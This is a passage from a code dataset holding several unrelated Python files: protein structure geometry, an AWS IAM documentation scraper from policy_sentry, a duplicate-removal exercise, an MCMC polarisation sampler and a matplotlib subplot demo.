\n\n self._orientvectors()\n\n def _orientvectors(self):\n first_halfdif = np.subtract(self._struct.first_aminoacid.ca.coordinates, self._cmf44)\n second_halfdif = np.subtract(self._struct.last_aminoacid.ca.coordinates, self._cmf11)\n \n first_sign = -1 * np.sign(np.dot(first_halfdif, self._eigf44))\n second_sign = np.sign(np.dot(second_halfdif, self._eigf11))\n\n self._eigf44 = np.multiply(self._eigf44, first_sign)\n self._eigf11 = np.multiply(self._eigf11, second_sign)\n\n first_lambda = np.dot(first_halfdif, self._eigf44)\n second_lambda = np.dot(second_halfdif, self._eigf11)\n\n self._tsf44 = np.add(np.multiply(first_lambda, self._eigf44), self._cmf44)\n self._tsf11 = np.add(np.multiply(second_lambda, self._eigf11), self._cmf11)\n\n def _jacobi_angles(self, workp):\n _struct = self._struct.duplicate(backbone = True)\n if workp == 'f11':\n moving_point = self._f11\n fixed_point = self._endp\n ini_coord = _struct.extract(self._f11, self._endp)._all_atoms_coordinates()\n distance = len(ini_coord)/3\n cm = self._cmf11\n elif workp == 'f44':\n moving_point = self._f44\n ini_coord = _struct.extract(self._inip, self._f44)._all_atoms_coordinates()\n distance = len(ini_coord)/3\n cm = self._cmf44\n\n new_coord = np.subtract(ini_coord, cm)\n x2, y2, z2, xy, yz, zx = 0, 0, 0, 0, 0, 0\n if self._sstype != 'E':\n for row in new_coord:\n x, y, z = row\n x2 += np.power(x, 2)\n y2 += np.power(y, 2)\n z2 += np.power(z, 2)\n xy += np.multiply(x, y)\n yz += np.multiply(y, z)\n zx += np.multiply(z, x)\n else:\n for i in range(0, len(ini_coord) - 4, 3):\n j=i+3\n x0, y0, z0 = new_coord[i:i+3][:,0], new_coord[i:i+3][:,1], new_coord[i:i+3][:,2]\n x1, y1, z1 = new_coord[j:j+3][:,0], new_coord[j:j+3][:,1], new_coord[j:j+3][:,2]\n\n xm, ym, zm = np.mean([x0, x1], axis = 0), np.mean([y0, y1], axis = 0), np.mean([z0, z1], axis = 0)\n\n x2 += np.sum(np.power(xm, 2))\n y2 += np.sum(np.power(ym, 2))\n z2 += np.sum(np.power(zm, 2))\n xy += np.sum(np.multiply(xm, ym))\n yz += np.sum(np.multiply(ym, zm))\n zx += np.sum(np.multiply(zm, xm))\n\n a = np.matrix([[y2 + z2, -xy, -zx],\n [ -xy, x2 + z2, -yz],\n [ -zx, -yz, x2 + y2]])\n\n eigenVal, eigenVec = LA.eig(a)\n #sort eigenVal / eigenVec by descending eigenVal value\n #get the smallest value as represents the axis that actually follows the structure direction\n idx = eigenVal.argsort()[::-1]\n eigenVal = eigenVal[idx]\n eigenVec = eigenVec[:,idx]\n\n if workp == 'f11': self._eigf11 = np.asarray(eigenVec[:,2]).reshape(-1)\n elif workp == 'f44': self._eigf44 = np.asarray(eigenVec[:,2]).reshape(-1)\n\n def _process_betas(self):\n advance_limit = 2 #plus the two already selected makes a total of 4\n degree_dif_threshold = 10\n\n end, advance = False, 1\n original_eigienf11 = self._eigf11\n while not end:\n new_me = copy.deepcopy(self)\n _struct = new_me._struct.duplicate(backbone = True)\n new_me._f11 = new_me._struct.aminoacids[ len(new_me._struct.aminoacids) - (self.max_ini_distance[new_me._sstype] + advance)].identifier\n new_me._cmf11 = _struct.extract(new_me._f11, new_me._endp).geometric_center()\n\n new_me._jacobi_angles('f11')\n difference = np.degrees(np.arccos(np.absolute(np.dot(new_me._eigf11, original_eigienf11))))\n if new_me._f11 == new_me._inip or advance >= advance_limit: end = True\n advance += 1\n if difference < degree_dif_threshold:\n self._f11 = new_me._f11\n self._cmf11 = new_me._cmf11\n self._eigf11 = new_me._eigf11\n\n end, advance = False, 1\n original_eigienf44 = self._eigf44\n while not end:\n new_me = copy.deepcopy(self)\n _struct = 
new_me._struct.duplicate(backbone = True)\n new_me._f44 = new_me._struct.aminoacids[ self.max_ini_distance[new_me._sstype] - 1 + advance].identifier\n new_me._cmf44 = _struct.extract(new_me._inip, new_me._f44).geometric_center()\n\n new_me._jacobi_angles('f44')\n difference = np.degrees(np.arccos(np.absolute(np.dot(original_eigienf44, new_me._eigf44))))\n if new_me._f44 == new_me._endp or advance >= advance_limit: end = True\n advance += 1\n if difference < degree_dif_threshold:\n self._f44 = new_me._f44\n self._cmf44 = new_me._cmf44\n self._eigf44 = new_me._eigf44\n\n def headerformat(self, ssnum = 1, ssidentifier = 'A'):\n inires = self._struct.aminoacids[0]\n endres = self._struct.aminoacids[-1]\n if self._sstype == 'H' or self._sstype == 'G':\n ini = '{1.type} {0._struct.chain}{1.number:>5d}{1.version}'.format(self, inires)\n end = '{1.type} {0._struct.chain}{1.number:>5d}{1.version}'.format(self, endres)\n return 'HELIX {0:>4d} {1:>3s} {2} {3} 1 {4:>35d}'.format(ssnum, ssidentifier, ini, end, self._length)\n elif self._sstype == 'E':\n ini = '{1.type} {0._struct.chain}{1.number:>4d}{1.version}'.format(self, inires)\n end = '{1.type} {0._struct.chain}{1.number:>4d}{1.version}'.format(self, endres)\n return 'SHEET {0:>4d} {1:>3s} 1 {2} {3} 0'.format(ssnum, ssidentifier, ini, end)\n else:\n raise NotImplementedError('Unknown secondary structure type!')\n\n def strdata(self, workp):\n data = []\n data.append(\"( {0._sstype} ) {0._inip:>4s} <-- {0._length:>2d} --> {0._endp:>4s}\".format(self))\n if workp == 'f11':\n data.append(\"\\tf11: {0._f11:>4s} cmf11: {0._cmf11:>50s} eigf11: {0._eigf11:>50s}\".format(self))\n elif workp == 'f44':\n data.append(\"\\tf44: {0._f44:>4s} cmf44: {0._cmf44:>50s} eigf44: {0._eigf44:>50s}\".format(self))\n return \"\\n\".join(data)\n\n def __repr__(self):\n data = []\n data.append(\"( {0._sstype} ) {0._inip:>4s} <-- {0._length:>2d} --> {0._endp:>4s}\".format(self))\n data.append(\"\\tf11: {0._f11:>4s} cmf11: {0._cmf11:>50s} eigf11: {0._eigf11:>50s}\".format(self))\n data.append(\"\\tf44: {0._f44:>4s} cmf44: {0._cmf44:>50s} eigf44: {0._eigf44:>50s}\".format(self))\n # data.append(repr(self._struct))\n return \"\\n\".join(data)\n","sub_path":"collision_detection_program/SBI/structure/protein/SecondaryStructure.py","file_name":"SecondaryStructure.py","file_ext":"py","file_size_in_byte":9270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"131210133","text":"\"\"\"\nFunctions for downloading the AWS docs on Actions, Resources, and Condition Keys.\n\nThe initialize command uses this to download the docs to the ~/policy_sentry/data/docs folder.\nThe utils/get_docs\n\nWe store the HTML files in this manner so that the user can be more confident in the integrity of the data -\nthat it has not been altered in any way. 
The user can reproduce our steps with the original content at any time,\nor update the HTML files on their own.\n\"\"\"\n\nfrom os import listdir\nfrom os.path import isfile, join\nimport logging\nimport re\nfrom bs4 import BeautifulSoup\nimport yaml\nimport requests\nfrom policy_sentry.shared.constants import BASE_DOCUMENTATION_URL\n\nlogger = logging.getLogger(__name__) # pylint: disable=invalid-name\n\n\ndef get_links_from_base_actions_resources_conditions_page():\n    \"\"\"Gets the links from the actions, resources, and conditions keys page, and returns their filenames.\"\"\"\n    html = requests.get(BASE_DOCUMENTATION_URL)\n    soup = BeautifulSoup(html.content, \"html.parser\")\n    html_filenames = []\n    for i in soup.find(\"div\", {\"class\": \"highlights\"}).findAll(\"a\"):\n        html_filenames.append(i[\"href\"])\n    return html_filenames\n\n\ndef update_html_docs_directory(html_docs_destination):\n    \"\"\"\n    Updates the HTML docs from remote location to either (1) local directory\n    (i.e., this repository), or (2) the config directory\n    :return:\n    \"\"\"\n    link_url_prefix = \"https://docs.aws.amazon.com/IAM/latest/UserGuide/\"\n    initial_html_filenames_list = (\n        get_links_from_base_actions_resources_conditions_page()\n    )\n    # Remove the relative path so we can download it\n    html_filenames = [sub.replace(\"./\", \"\") for sub in initial_html_filenames_list]\n    # Replace '.html' with '.partial.html' because that's where the current docs live\n    html_filenames = [sub.replace(\".html\", \".partial.html\") for sub in html_filenames]\n\n    for page in html_filenames:\n        response = requests.get(link_url_prefix + page, allow_redirects=False)\n        # Replace the CSS stuff. Basically this:\n        \"\"\"\n        (example <link href=\"...\" rel=\"stylesheet\"> tags were stripped by HTML\n        scraping; the loop below rewrites their relative hrefs into absolute\n        https://docs.aws.amazon.com URLs)\n        list_amazonkendra.html downloaded\n        \"\"\"\n        soup = BeautifulSoup(response.content, \"html.parser\")\n        for link in soup.find_all(\"link\"):\n            if link.get(\"href\").startswith(\"/\"):\n                temp = link.attrs[\"href\"]\n                link.attrs[\"href\"] = link.attrs[\"href\"].replace(\n                    temp, f\"https://docs.aws.amazon.com{temp}\"\n                )\n\n        with open(html_docs_destination + page, \"w\") as file:\n            # file.write(str(soup.html))\n            file.write(str(soup.prettify()))\n            file.close()\n        logger.info(\"%s downloaded\", page)\n\n\n# Borrowed and altered from Parliament:\n# https://github.com/duo-labs/parliament/commit/2979e131ff3af9c79137817eaa57a05ae5007706#diff-1669fdcc34b13c17017fb2aae433801d\n# pylint: disable=invalid-name\ndef create_service_links_mapping_file(html_docs_destination, links_yml_file):\n    \"\"\"Parses the AWS HTML docs to create a YML file that understands the mapping between services and HTML files.\"\"\"\n    prefix_list = []\n    links_shortened = {}\n    for filename in [\n        f\n        for f in listdir(html_docs_destination)\n        if isfile(join(html_docs_destination, f))\n    ]:\n        if not filename.startswith(\"list_\"):\n            continue\n\n        with open(html_docs_destination + filename, \"r\") as f:\n            soup = BeautifulSoup(f.read(), \"html.parser\")\n            main_content = soup.find(id=\"main-content\")\n            if main_content is None:\n                continue\n\n            # Get service name\n            # title = main_content.find(\"h1\", class_=\"topictitle\")\n            # title = re.sub(\".*Actions, Resources, and Condition Keys for *\", \"\", str(title))\n            # title = title.replace(\"</h1>\", \"\")\n            # service_name = chomp(title)\n\n            # prefix = \"\"\n            for c in main_content.find(\"h1\", class_=\"topictitle\").parent.children:\n                if \"prefix\" in str(c):\n                    prefix = str(c)\n                    prefix = prefix.split('<code class=\"code\">')[1]\n                    prefix = prefix.split(\"</code>\")[0]\n                    prefix = chomp(prefix)\n                    prefix_list.append(prefix)\n                    if prefix not in 
links_shortened:\n links_shortened[prefix] = [filename]\n else:\n links_shortened[prefix].append(filename)\n break\n\n links_dict = {}\n for key, value in sorted(links_shortened.items()):\n links_dict[key] = value\n with open(links_yml_file, \"w+\") as outfile:\n yaml.dump(links_dict, outfile, default_flow_style=False)\n outfile.close()\n prefix_list.sort()\n prefix_list = list(dict.fromkeys(prefix_list))\n logger.info(\"Created the service-to-links YML mapping file: \", links_yml_file)\n return prefix_list\n\n\ndef get_list_of_service_prefixes_from_links_file(links_yml_file):\n \"\"\"\n Gets a list of service prefixes from the links file. Used for unit tests.\n :return:\n \"\"\"\n # links_yml_file = os.path.abspath(os.path.dirname(__file__)) + '/data/links.yml'\n service_prefixes = []\n with open(links_yml_file, \"r\") as yaml_file:\n try:\n cfg = yaml.safe_load(yaml_file)\n except yaml.YAMLError as exc:\n logger.critical(exc)\n for service_name in cfg:\n service_prefixes.append(service_name)\n return service_prefixes\n\n\n# Borrowed from Parliament:\n# https://github.com/duo-labs/parliament/commit/2979e131ff3af9c79137817eaa57a05ae5007706#diff-1669fdcc34b13c17017fb2aae433801d\ndef chomp(string):\n \"\"\"This chomp cleans up all white-space, not just at the ends\"\"\"\n string = str(string)\n response = string.replace(\"\\n\", \" \") # Convert line ends to spaces\n response = re.sub(\n \" [ ]*\", \" \", response\n ) # Truncate multiple spaces to single space\n response = re.sub(\"^[ ]*\", \"\", response) # Clean start\n return re.sub(\"[ ]*$\", \"\", response) # Clean end\n","sub_path":"policy_sentry/scraping/awsdocs.py","file_name":"awsdocs.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"148226511","text":"# -*- coding: utf-8 -*-\r\nimport sys\r\nsys.path.append(\"..\")\r\nfrom utils.FileCreator import FileCreator, HtmlProperty\r\nfrom utils.WebLoader import WebLoader\r\n\r\n\r\ndef main():\r\n FileCreator().execute_all(\"../training/data/\")\r\n webLoader = WebLoader()\r\n webLoader.execute_all(\"../training/entities/\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main/create_files.py","file_name":"create_files.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"256346783","text":"'''\nWrite a program (function!) 
that takes a list and\nreturns a new list that contains all the elements of the first list minus all the duplicates.\n\nExtras:\n\nWrite two different functions to do this - one using a loop and constructing a list, and another using sets.\nGo back and do Exercise 5 using sets, and write the solution for that in a different function.\n'''\n\na = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\nb = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n\ndef removeDuplicates(a,b):\n lst = a\n [lst.append(i) for i in b if i not in lst]\n return lst\n\nprint(removeDuplicates(a,b))","sub_path":"removeDuplicate.py","file_name":"removeDuplicate.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237812743","text":"\"\"\"\nModule for sampling background polarisation and stellar polarisation\nin submm.\n\"\"\"\n\nimport numpy as np\nimport healpy as hp\nimport tools_mod as tools\nimport matplotlib.pyplot as plt\nimport sys, time\nfrom functools import partial\n\n\n\ndef QU_sampler(QU, qu, x_mean, x_err, mask, data_mean,\\\n Nside=256, Niter=1000, R_Pp=None):\n \"\"\"\n Input:\n - QU, 2d array of submm polarization (2, Npix)\n - qu, 2d array of visual polarization (2, Npix)\n - x_mean, seq. of mean parameters values to be fitted. \n (R_Pp, Qbkgr, Ubkgr)\n ...\n Return:\n QU stat and background. list of arrays\n \"\"\"\n \n print(x_mean)\n print(x_err)\n burnin = int(Niter/2) \n print(burnin)\n cov0 = Cov(x_mean)\n pixels = np.arange(hp.nside2npix(Nside))\n QU_model = np.zeros((2, hp.nside2npix(Nside)))\n QU_err = np.zeros((2, hp.nside2npix(Nside)))\n params_maxL = np.zeros((len(x_mean), hp.nside2npix(Nside)))\n params = np.zeros((Niter, len(x_mean), hp.nside2npix(Nside)))\n\n #print(R_Pp)\n dt_mean = np.array([-R_Pp, np.zeros(len(mask)), np.zeros(len(mask))])\n print('-----------')\n mod = QU_func(data_mean, qu[:,mask])\n mod2 = QU_func(dt_mean, qu[:,mask])\n #print(QU[:,mask], np.mean(QU[:,mask], axis=1), np.std(QU[:,mask], axis=1))\n #print(mod, np.mean(mod, axis=1), np.std(mod, axis=1))\n #print(mod2, np.mean(mod2, axis=1), np.std(mod2, axis=1))\n #print(logLike(mod, QU[:,mask]))\n #print(QU_func(np.array([-R_Pp[0], -0.005, 0.025]), qu[:,mask[0]]))\n res = (QU[:,mask] - mod)/QU[:,mask]\n res2 = (QU[:,mask] - mod2)/QU[:,mask]\n #print(res/res2)\n print(np.mean(QU[:,mask]/qu[:,mask], axis=1))\n print(np.mean(R_Pp*qu[0,mask]), np.mean(R_Pp*qu[1,mask]))\n\n \"\"\"\n plt.scatter(res[0,:], res[1,:], marker='.', c=R_Pp, cmap='jet', vmin=3.8,\\\n vmax=5.2)\n plt.colorbar()\n plt.grid(True)\n plt.figure()\n plt.scatter(qu[0,mask], QU[0,mask], marker='x', c='k')\n plt.scatter(qu[1,mask], QU[1,mask], marker='x', c='b')\n #plt.scatter(qu[0,mask], mod[0], marker='.', c=R_Pp, cmap='jet')\n #plt.scatter(qu[1,mask], mod[1], marker='.', c=R_Pp, cmap='jet')\n plt.scatter(qu[0,mask], mod2[0], marker='.', c=R_Pp, cmap='brg',\\\n vmin=3.8, vmax=5.2)\n plt.scatter(qu[1,mask], mod2[1], marker='.', c=R_Pp, cmap='brg',\\\n vmin=3.8, vmax=5.2)\n plt.colorbar()\n \"\"\"\n t0 = time.time()\n for i, pix in enumerate(pixels[mask]):\n t01 = time.time()\n \n # Initiate functions:\n log_like = partial(logLike, data=QU[:,pix])\n log_prior = partial(logPrior, mu=data_mean, sigma=x_err)\n func = partial(QU_func, qu=qu[:,pix])\n \n # Initialize:\n params0, model0, loglike0, logprior0 = Initialize(log_like,\\\n log_prior,\\\n func, x_mean,\\\n cov0)\n\n # Metropolis Hastrings:\n params_maxL[:,pix], params[:,:,pix] = MH(log_like, log_prior,\\\n func, 
params0, model0,\\\n loglike0, logprior0,\\\n x_mean, cov0, burnin, Niter)\n\n #\n print(QU[:,pix], QU_func(params_maxL[:,pix], qu[:,pix]))\n #QU_model[:,pix] = QU_func(params_maxL[:,pix], qu[:,pix])\n #QU_err[:,pix] = None\n #print(np.mean(params[:,:,pix],axis=0), np.std(params[:,:,pix],axis=0))\n t11 = time.time()\n print('Sampling time for pixel {}: {} s'.format(pix, t11-t01))\n print('-->')\n #break\n #\n t2 = time.time()\n print('Total sampling time: {} s'.format(t2-t0))\n print('===================')\n #plot_params(params_maxL, xlab=[], ylab=[])\n #plot_params(params, hist=True, xlab=[], ylab=[])\n #plot_params(params, xlab=[], ylab=[])\n #print(params_maxL[:, mask])\n plt.subplot(311)\n plt.plot(params_maxL[0,mask], '.r')\n plt.subplot(312)\n plt.plot(params_maxL[1,mask], '.k')\n plt.subplot(313)\n plt.plot(params_maxL[2,mask], '.b')\n print(np.mean(params_maxL[:,mask], axis=1), np.std(params_maxL[:,mask], axis=1))\n print(np.shape(QU_err[:,mask]))\n params_err = error_est(params[burnin:,:,mask], model=False)\n QU_model[:, mask] = QU_func(params_maxL[:,mask], qu[:,mask])\n QU_err[:,mask] = error_est(params[burnin:,:,mask], qu[:,mask], model=True)\n\n res_mod = (QU[:,mask]-QU_model[:,mask])/QU[:,mask]\n #print(QU_model[:,mask])\n print(np.mean(QU[:,mask], axis=1), np.std(QU[:,mask], axis=1))\n print(np.mean(QU_model[:,mask], axis=1), np.std(QU_model[:,mask], axis=1))\n #print(res_mod)\n\n R_mod = np.sqrt((QU_model[0,mask]**2 + QU_model[1,mask]**2) \\\n / (qu[0,mask]**2 + qu[1,mask]**2))\n \n plt.figure()\n plt.plot(R_Pp, R_mod, '.g')\n plt.plot(R_Pp, -params_maxL[0,mask], '.r')\n\n print('Stellar and background polarisation')\n QU_star = QUstar(params_maxL[0,mask], qu[:,mask])\n QU_bkgr = QUbkgr(params_maxL[1:,mask])\n print(np.mean(QU[:,mask], axis=1))\n print(np.mean(QU_star, axis=1), np.std(QU_star, axis=1))\n print(np.mean(QU_bkgr, axis=1), np.std(QU_bkgr, axis=1))\n print(np.mean(R_mod), np.std(R_mod))\n plot_model1(qu, QU, QU_model, R_Pp)\n #\"\"\"\n plt.figure()\n plt.scatter(qu[0,mask], QU_star[0,:], c='k', marker='^')\n plt.scatter(qu[1,mask], QU_star[1,:], c='b', marker='^')\n plt.scatter(qu[0,mask], QU_model[0,mask], c='grey', marker='^')\n plt.scatter(qu[1,mask], QU_model[1,mask], c='skyblue', marker='^')\n \n plt.figure()\n plt.scatter(qu[0,mask], QU_bkgr[0,:], c='k', marker='^')\n plt.scatter(qu[1,mask], QU_bkgr[1,:], c='b', marker='^')\n #plt.ylim(-0.01, 0.015)\n #\"\"\"\n return None\n\ndef Initialize(log_like, log_prior, model_func, mean, cov):\n \"\"\"\n Initialization of the parameters and functions.\n \"\"\"\n \n curr_params = proposal_rule(cov, mean)\n #print('curr params:', curr_params)\n curr_model = model_func(curr_params)\n #print('model', curr_model)\n curr_like = log_like(curr_model)\n #print('curr like:', curr_like)\n curr_prior = log_prior(curr_params)\n #print('curr prior:', curr_prior)\n return(curr_params, curr_model, curr_like, curr_prior)\n\ndef MH(log_like, log_prior, model_func, curr_params, curr_model,\\\n curr_like, curr_prior, mean, cov, burnin, Niter=1000):\n\n \"\"\"\n The Metropolis Hastings algorthm.\n \"\"\"\n accept = np.zeros(Niter)\n params = np.zeros((Niter, len(mean)))\n counter = 0\n steplength = 1\n max_like = -50\n maxL_params = curr_params\n\n # Sampling loop:\n for i in range(Niter):\n # propose new parameters:\n prop_params = proposal_rule(cov*steplength, mean)\n \n # call MH_step: \n accept[i], curr_params, maxL_params, max_like =\\\n MH_step(log_like, log_prior,\\\n model_func, prop_params,\\\n curr_params, curr_like,\\\n 
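The 50-iteration step-size rule inside the sampling loop above, isolated as a toy helper for readability (the 0.2/0.5 acceptance window is the one the sampler uses; everything else is illustrative):

def tune_steplength(n_accepted, n_total, steplength):
    # shrink the proposal scale when acceptance is too rare, grow it when
    # acceptance is too easy; leave it alone inside the target window
    rate = n_accepted / float(n_total)
    if rate < 0.2:
        return steplength / 2
    elif rate > 0.5:
        return steplength * 2
    return steplength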
curr_prior, max_like,\\\n                                                 maxL_params)\n        params[i,:] = curr_params\n        #print(accept[i], prop_params)\n        # define current model, logL and logPrior from accepted parameters:\n        curr_model_new = model_func(curr_params)\n        curr_like = log_like(curr_model_new)\n        curr_prior = log_prior(curr_params)\n        mean = curr_params\n        # update the steplength in the covariance matrix:\n        if accept[i]:\n            counter += 1\n        \n        if (i+1)%50 == 0:\n            if counter/float(i+1) < 0.2:\n                steplength /= 2\n            elif counter/float(i+1) > 0.5:\n                steplength *= 2\n            else:\n                pass\n\n        # make new covariance matrix from the drawn parameters:\n        if (i+1)%200 == 0:\n            cov = Cov(params[:i,:].T)\n        #print(i, curr_params, curr_like)\n        #print(cov)\n    #\n    print(counter/float(Niter))\n    print('max.like. {}, max.like. params:'.format(max_like), maxL_params)\n    mod = model_func(curr_params)\n    modL = model_func(maxL_params)\n    print(mod)\n    print(modL)\n    print(np.mean(params[burnin:,:],axis=0),np.std(params[burnin:,:],axis=0))\n    \n    #plt.subplot(311)\n    #plt.plot(params[:,0])\n    #plt.subplot(312)\n    #plt.plot(params[:,1])\n    #plt.subplot(313)\n    #plt.plot(params[:,2])\n    #plt.show()\n    return(maxL_params, params)\n\n\ndef MH_step(log_like, log_prior, model_func, prop_params, curr_params,\\\n            curr_like, curr_prior, max_like, maxL_params):\n\n    \"\"\"\n    The step in the MH algorithm\n    \"\"\"\n    # proposed model: \n    prop_model = model_func(prop_params)\n    prop_like = log_like(prop_model)\n    prop_prior = log_prior(prop_params)\n\n    # posterior: \n    post_old = curr_like + curr_prior\n    post_new = prop_like + prop_prior\n    #print(prop_prior, curr_prior, prop_like, curr_like)\n    # acceptance testing: \n    a = np.exp(post_new - post_old)\n    draw = np.random.uniform(0, 1)\n    #print(a, draw, post_old, post_new)\n    if (a > draw) and (a < np.inf):\n        accept = True\n        curr_params = prop_params\n        if prop_like > max_like:\n            max_like = prop_like\n            maxL_params = curr_params\n    else:\n        accept = False  # keep the current parameters\n    #\n    return(accept, curr_params, maxL_params, max_like)\n    \n\ndef logLike(model, data, sigma=0.01):\n    L = -0.5*((data - model)/sigma)**2\n    return(np.sum(L))\n\ndef logPrior(params, mu=None, sigma=None):\n    pm = 0\n    for i in range(len(params)):\n        # Gaussian log-prior (up to an additive constant); the residual is squared\n        pm += -0.5*((params[i] - mu[i])/sigma[i])**2\n    return(pm)\n\ndef proposal_rule(cov, mean=None):\n    \"\"\"\n    Draw new parameters for proposal. \n    \"\"\"\n    params = np.random.multivariate_normal(mean, cov)\n    # check if R_Pp has the right sign? should be negative\n    params[0] = test_params(params[0], mean[0], cov[0,0], crit='a')\n    params[1] = test_params(params[1], mean[1], cov[1,1], crit='bq')\n    params[2] = test_params(params[2], mean[2], cov[2,2], crit='bu')\n    #print(params)\n    return(params)\n\ndef test_params(p, mean, cov, crit='q', i=0):\n    # 'a' is the slope R_Pp and must stay negative; 'bq'/'bu' are the Q/U\n    # background offsets and are kept inside (-1, 1). Redraw at most 10 times.\n    if crit == 'a':\n        while p >= 0:\n            p = np.random.normal(mean, np.sqrt(cov))\n            i += 1\n            if i > 10:\n                break\n        return(p)\n    elif crit in ('bq', 'bu'):\n        while abs(p) > 1:\n            p = np.random.normal(mean, np.sqrt(cov))\n            i += 1\n            if i > 10:\n                break\n        return(p)\n    else:\n        return(p)\n\ndef Cov(x):\n    if np.ndim(x) == 1:\n        N = len(x)\n        return(np.eye(N))\n    else:\n        return(np.cov(x))\n\n
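A tiny numeric check of the two log-densities above (illustrative): both should vanish exactly at the truth.

import numpy as np
data = np.array([1.0, 2.0])
assert logLike(data, data) == 0.0                     # zero residual => log-likelihood peak
assert logPrior([0.5], mu=[0.5], sigma=[0.1]) == 0.0  # evaluated at the prior mean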
def QU_func(params, qu):\n    \"\"\"\n    Input:\n    - params, list. (R_Pp, Qbkgr, Ubkgr)\n    - qu, 2d array of visual pol.\n    Return:\n       QU array\n    \"\"\"\n\n    QU = np.array([params[0]*qu[0] + params[1],\\\n                   params[0]*qu[1] + params[2]])\n    return(QU)\n\ndef QUstar(a, qu):\n    \"\"\"\n    Estimate the submm polarisation contribution from stellar parts\n    \"\"\"\n    return(a*qu)\n\ndef QUbkgr(bs):\n    \"\"\"\n    Estimate the background polarisation \n    \"\"\"\n    return(np.array([bs[0,:], bs[1,:]]))\n\ndef error_est(params, qu=None, model=True):\n    \"\"\"\n    Function to estimate the uncertainties of the model, or for each\n    parameter\n    \n    Input:\n    - params, array with all sampled parameter values after burnin\n    - qu, array with the visual polarization data\n    - model, bool. If True estimate uncertainties for the model, else\n    estimate uncertainties of the parameters.\n    Returns:\n    uncertainties for model or parameters\n    \"\"\"\n    #print(np.shape(params))\n    if model is True:\n        print('uncertainties for model')\n        QU = np.zeros((len(params[:,0,0]), 2, len(qu[0,:])))\n        for i in range(len(params[:,0,0])):\n            QU[i,:,:] = QU_func(params[i,:,:], qu)\n        print(np.shape(QU)) # (500,2,30)\n        QU_err = np.std(QU, axis=0)\n        #print(QU_err) \n        return QU_err\n    else:\n        print('Uncertainties for parameters')\n        params_err = np.std(params, axis=0)\n        #print(np.shape(params_err))\n        return(params_err)\n\ndef plot_model1(qu, QU, mod, R_mod):\n    # NOTE: 'mask' is assumed to be available from the enclosing scope, matching\n    # the call in QU_sampler; 'mod' is the sampled model array.\n    plt.figure()\n    plt.scatter(qu[0,mask], QU[0,mask], c='grey', marker='^', label='data')\n    plt.scatter(qu[1,mask], QU[1,mask], c='skyblue', marker='^')\n    plt.scatter(qu[0,mask], mod[0,mask], c=R_mod, marker='.', cmap='brg',\\\n                vmin=3.8, vmax=5.2, label='model')\n    plt.scatter(qu[1,mask], mod[1,mask], c=R_mod, marker='.', cmap='brg',\\\n                vmin=3.8, vmax=5.2)\n    cbar = plt.colorbar()\n    cbar.set_label(r'$R_{{P/p}}$ [MJy/sr]')\n    plt.xlabel(r'$q, u$')\n    plt.ylabel(r'$Q, U$ [MJy/sr]')\n    plt.title('Plot data vs model')\n    plt.savefig('Figures/correlations/test/model_vs_data_sampler.png')\n\ndef plot_params(p, hist=False, xlab=None, ylab=None):\n    if np.ndim(p) == 3:\n        print('plot histogram of returned samples')\n        f1, (ax1, ax2) = plt.subplots(2,1)\n        if hist is True:\n            for i in range(len(p[0,0,:])):\n                ax1.hist(p[:,0,i], bins=50, color='r', histtype='step')\n                \n                ax2.hist(p[:,1,i], bins=50, color='k',histtype='step',\\\n                         label=r'$Q$')\n                ax2.hist(p[:,2,i], bins=50, color='b',histtype='step',\\\n                         label=r'$U$')\n        else:\n            for i in range(len(p[0,0,:])):\n                ax1.plot(p[:,0,i], '-r')\n                ax2.plot(p[:,1,i], '-k', label=r'$Q$')\n                ax2.plot(p[:,2,i], '-b', label=r'$U$')\n        #\n\n        ax1.set_xlabel(xlab[0])\n        ax1.set_ylabel(ylab)\n        \n        ax2.set_xlabel(xlab[1])\n        ax2.set_ylabel(ylab)\n        ax2.legend()\n        \n        \n    else:\n        print('Plot maximum likelihood parameters')\n        # plt.subplots(3, 2) returns 3 rows of 2 axes, so unpack it that way\n        f, ((a1, a2), (a3, a4), (a5, a6)) = plt.subplots(3, 2)\n        \n        a1.plot(p[0,:], '.r')\n        a2.plot(p[1,:], '.k')\n        a3.plot(p[2,:], '.b')\n\n#\n","sub_path":"Polarisation_module/pol_sampler_mod.py","file_name":"pol_sampler_mod.py","file_ext":"py","file_size_in_byte":14432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
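Illustrative use of error_est() from the record above with fake post-burn-in draws (shapes follow the sampler: 500 draws, 3 parameters, 30 pixels):

import numpy as np
samples = np.random.randn(500, 3, 30)   # stand-in for params[burnin:, :, mask]
qu = np.random.randn(2, 30)             # stand-in for qu[:, mask]
param_err = error_est(samples, model=False)      # -> shape (3, 30)
model_err = error_est(samples, qu, model=True)   # -> shape (2, 30)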
+{"seq_id":"163711363","text":"# using subplots\r\n# slightly different from subplot\r\nimport matplotlib.pyplot as p\r\nimport numpy as n\r\n\r\nx=n.arange(-5,6)\r\ny1=x\r\ny2=x**2\r\ny3=x**3\r\ny4=x**4\r\n\r\nfig, ax=p.subplots(nrows=2,ncols=2,figsize=(10,10))\r\nax[0,0].plot(x,y1,"bo")\r\nax[0,1].plot(x,y2,"g^")\r\nax[1,0].plot(x,y3,"r-")\r\nax[1,1].plot(x,y4,".-")\r\n\r\n# titles\r\nax[0,0].set_title("Kurva Linier")\r\nax[0,1].set_title("Kurva Kuadratik")\r\nax[1,0].set_title("Kurva polinom tiga")\r\nax[1,1].set_title("Kurva Polinom Empat")\r\n\r\np.suptitle("Latihan Kurva keempat")\r\np.show()\r\n\r\n# Source: https://towardsdatascience.com/matplotlib-tutorial-learn-basics-of-pythons-powerful-plotting-library-b5d1b8f67596\r\n","sub_path":"python_script/grafik_subplots.py","file_name":"grafik_subplots.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
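A compact variant of the 2x2 grid above using ax.flat, so all four panels are filled in one loop (same data, purely illustrative):

import numpy as np
import matplotlib.pyplot as plt

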